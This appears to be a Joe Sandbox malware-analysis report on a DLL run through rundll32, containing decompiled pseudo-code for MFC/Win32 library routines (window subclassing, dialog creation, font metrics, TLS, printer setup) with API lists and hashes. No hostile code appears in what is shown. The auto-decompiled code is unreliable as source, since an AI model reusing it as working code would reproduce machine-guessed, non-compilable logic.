					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E1000C6E6(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E10017C60(_t63);
				}
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1000CB7B
FindResourceA.KERNEL32(?,?,00000005), ref: 1000CBAE
LoadResource.KERNEL32(?,00000000), ref: 1000CBB6
LockResource.KERNEL32(?,00000024,100014EC,00000000,FBF2B489), ref: 1000CBC7
GetDesktopWindow.USER32 ref: 1000CBFA
IsWindowEnabled.USER32(?), ref: 1000CC08
EnableWindow.USER32(?,00000000), ref: 1000CC17

Part of subcall function 100128F8: IsWindowEnabled.USER32(?), ref: 10012901

Part of subcall function 10012913: EnableWindow.USER32(?,FBF2B489), ref: 10012920

EnableWindow.USER32(?,00000001), ref: 1000CCF3
GetActiveWindow.USER32 ref: 1000CCFE
SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,FBF2B489), ref: 1000CD0C
FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,FBF2B489), ref: 1000CD28

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
Instruction ID: 8f78f448105f665873ac1cd7b5fa33a3343bcf420d8a1ae80c8a79bff85a7528
Opcode Fuzzy Hash: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
Instruction Fuzzy Hash: A251BF34A007098BFF11DFA5C999EAEBBF1EF44781F20002EE506A6195CB759E41CF55

Uniqueness

Uniqueness Score: -1.00%

Function 10011245, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10011245(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E10017BF4(E1002864B, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E1000FB5C(1, _t60, _t71,  *(_t71 + 0x14));
					E10011159(_t60, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E100111CF(1, _t66, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E1000E865(E1000FB5C(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E100100F3(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E10017C60( *(_t71 - 0x14));
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1001124C
GetPropA.USER32 ref: 1001125B
CallWindowProcA.USER32 ref: 100112B5

Part of subcall function 100100F3: GetWindowRect.USER32 ref: 1001011B
Part of subcall function 100100F3: GetWindow.USER32(?,00000004), ref: 10010138

SetWindowLongA.USER32(?,000000FC,?), ref: 100112DC
RemovePropA.USER32 ref: 100112E4
GlobalFindAtomA.KERNEL32 ref: 100112EB
GlobalDeleteAtom.KERNEL32 ref: 100112F2

Part of subcall function 1000E865: GetWindowRect.USER32 ref: 1000E871

CallWindowProcA.USER32 ref: 10011346

Strings

AfxOldWndProc423, xrefs: 10011254, 10011259, 100112E2, 100112EA

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
Instruction ID: 0d19250562dc5a9dad551a697ef26f9b08052b09a3581b526b6705a222a2b98b
Opcode Fuzzy Hash: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
Instruction Fuzzy Hash: 2D317F7680021ABBDF05DFA0CD89EFF7FB9FF05651F100118F611A6051DB359A61ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000C984, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000C984(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E10017BF4(E1002800E, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E1000D5EC(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E1000D5EC(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E10012406(_t103, _t104, 0, _t129, _t136, 0x10);
				E10012406(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E10017C60(_t65);
					}
					E10009E23(_t132 - 0x1c, E10013479());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E10014A97(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x1005aa84; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E100115DC(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E1000C402, 0);
							E10009CB7( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E1000FC04(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E10014A60(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E100149BE(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E100146D7(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E100146C9(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E1000C95C(_t132 - 0x1c, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1000C98B
GetSystemMetrics.USER32 ref: 1000CA3C
GlobalLock.KERNEL32 ref: 1000CAA5
CreateDialogIndirectParamA.USER32(?,?,?,1000C402,00000000), ref: 1000CAD4

Strings

MS Shell Dlg, xrefs: 1000CA46

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
Instruction ID: aca18bfbc2af702d8352a65e986f2fe47acd8ccb78c3dcc49b793ffb13d9be50
Opcode Fuzzy Hash: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
Instruction Fuzzy Hash: AF51A031A0020D9FDB05DFA4C88ADEEBBB4EF45780F254559F442EB199DB349E81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 100149BE, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E100149BE(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x10057a08; // 0xfbf2b489
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E100167D5(E1001486F(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

APIs

GetStockObject.GDI32(00000011), ref: 100149E4
GetStockObject.GDI32(0000000D), ref: 100149EC
GetObjectA.GDI32(00000000,0000003C,?), ref: 100149F9
GetDC.USER32(00000000), ref: 10014A08
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10014A1C
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10014A28
ReleaseDC.USER32 ref: 10014A34

Strings

System, xrefs: 100149DF, 10014A49

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
Instruction ID: a63e4a091ca1b7be2859df30e5517b7a4abcdff67d16382c886f5131b7cbdf71
Opcode Fuzzy Hash: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
Instruction Fuzzy Hash: 39118F71A40268EBEB10DBA1CC85FAE7BB8FF04781F420015FA02AA190DE709D46CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10009360, Relevance: 13.6, APIs: 9, Instructions: 105
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10009360(intOrPtr __ecx, intOrPtr _a4) {
				long _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				signed int _t38;
				long _t49;
				intOrPtr _t50;
				void* _t60;
				long _t76;
				void* _t84;
				void* _t85;

				_v32 = __ecx;
				if(_a4 == 8) {
					return E100090F0(_t60, _v32, _t84, _t85);
				}
				if(_a4 == 9) {
					_t38 =  *0x10058ece & 0x000000ff;
					if(_t38 != 0) {
						_v8 = SendMessageA( *(_v32 + 0x94), 0xe, 0, 0);
						_v12 = _v32 + 0x74;
						SendMessageA( *(_v12 + 0x20), 0xb1, _v8, _v8);
						if(0 == 0) {
							SendMessageA( *(_v12 + 0x20), 0xb7, 0, 0);
						}
						_t76 =  *0x10058f0c; // 0x1005aa2c
						_v16 = _t76;
						SendMessageA( *(_v32 + 0x94), 0xc2, 0, _v16);
						if(_v8 > 0x1000) {
							_t50 =  *0x10058f0c; // 0x1005aa2c
							_t21 = _t50 - 0xc; // 0x0
							_v20 =  *_t21;
							_v24 = _v32 + 0x74;
							SendMessageA( *(_v24 + 0x20), 0xb1, 0, _v20);
							if(0 == 0) {
								SendMessageA( *(_v24 + 0x20), 0xb7, 0, 0);
							}
							SendMessageA( *(_v32 + 0x94), 0xc2, 0, 0x100295fc);
						}
						_v28 = SendMessageA( *(_v32 + 0x94), 0xba, 0, 0);
						_t49 = SendMessageA( *(_v32 + 0x94), 0xb6, 0, _v28);
						 *0x10058ece = 0;
						return _t49;
					}
				}
				return _t38;
			}

APIs

SendMessageA.USER32 ref: 100093A5
SendMessageA.USER32 ref: 100093CB
SendMessageA.USER32 ref: 100093E5
SendMessageA.USER32 ref: 10009409
SendMessageA.USER32 ref: 1000943E
SendMessageA.USER32 ref: 10009458
SendMessageA.USER32 ref: 10009474
SendMessageA.USER32 ref: 1000948D
SendMessageA.USER32 ref: 100094AB

Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091CA
Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091E4

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$_strlen
String ID:
API String ID: 3697954797-0
Opcode ID: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
Instruction ID: 329eb70852e0cb7846d89551eaf01311ead5dc39bdcc3cc6f9670776eeec1b90
Opcode Fuzzy Hash: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
Instruction Fuzzy Hash: BE411974A40205AFEB04CBA4CD99FAEB7B5FB4C740F208159FA45AB3D5C775AA02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013C4D, Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E10013C4D(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E10017BF4(E10028893, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E10013965(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x1002b1d8;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E10013A82( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E100134F9(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E100134F9(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E1000A0A7(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E100174D0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E10017C60(_t36);
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 10013C54
EnterCriticalSection.KERNEL32(?,00000010,10013E18,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013C65
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013C83
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013CB7
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
_memset.LIBCMT ref: 10013D42
TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
Instruction ID: 361604de1dd3242a2b5db774f8c39e7d6c7c8771dcfb3c7945be7f3a81b5ec95
Opcode Fuzzy Hash: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
Instruction Fuzzy Hash: 3F317C74500616AFDB20DF65E886C5EBBB5FF04350B21C529F95AAB661CB30ED90CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000A6E3, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000A6E3(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E10014056(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10014056( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

APIs

GlobalLock.KERNEL32 ref: 1000A700
lstrcmpA.KERNEL32(?,?), ref: 1000A70C
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1000A71E
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A73E
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A746
GlobalLock.KERNEL32 ref: 1000A750
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1000A75D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1000A775

Part of subcall function 10014056: GlobalFlags.KERNEL32(?), ref: 10014061
Part of subcall function 10014056: GlobalUnlock.KERNEL32(?,?,?,1000A4C2,?,00000004,1000146F), ref: 10014073
Part of subcall function 10014056: GlobalFree.KERNEL32 ref: 1001407E

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
Instruction ID: f32a97280aef975bd063cd01cc2dace1ac46c13f829f9411547ae7bffa227ebc
Opcode Fuzzy Hash: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
Instruction Fuzzy Hash: ED11A075500600BBEB22CBBADC89DAF7AFDFB89B807104519F60AD5021DB31DD91DB20

Uniqueness

Uniqueness Score: -1.00%

Function 10013854, Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013854(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x1005aa30 = GetSystemMetrics(2) + 1;
				 *0x1005aa34 = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x1001385f
0x10013865
0x1001386c
0x10013874
0x1001387e
0x1001388f
0x10013899
0x100138a1
0x100138ad

APIs

GetSystemMetrics.USER32 ref: 10013861
GetSystemMetrics.USER32 ref: 10013868
GetSystemMetrics.USER32 ref: 1001386F
GetSystemMetrics.USER32 ref: 10013879
GetDC.USER32(00000000), ref: 10013883
GetDeviceCaps.GDI32(00000000,00000058), ref: 10013894
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1001389C
ReleaseDC.USER32 ref: 100138A4

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
